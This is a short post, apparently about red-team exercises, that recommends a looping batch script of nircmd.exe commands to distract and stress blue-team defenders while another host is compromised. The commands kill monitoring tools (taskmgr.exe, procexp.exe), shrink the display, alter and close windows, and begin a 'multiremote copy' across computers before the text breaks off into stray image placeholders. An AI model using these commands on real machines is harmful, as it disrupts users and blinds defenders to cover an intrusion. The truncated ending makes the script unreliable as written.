One of the best ways to throw blue teamers off the scent of another host getting owned, which also has the added effect of stressing them out is a batch script that runs through some of the more annoying features in nircmd.exe in succession and at regular intervals:
http://www.nirsoft.net/utils/nircmd.html
setdisplay 640x480 killprocess taskmgr.exe killprocess procexp.exe win -style title “my computer” 0x00c00000 win child title “my computer” +exstyle all 0x00400000 win +exstyle title “my computer” 0x00400000 win trans ititle “internet explorer” 256 win close class “CabinetWClass” multiremote copy “c:tempcomputers.![]()
![]()
![]()
![]()
![]()
↧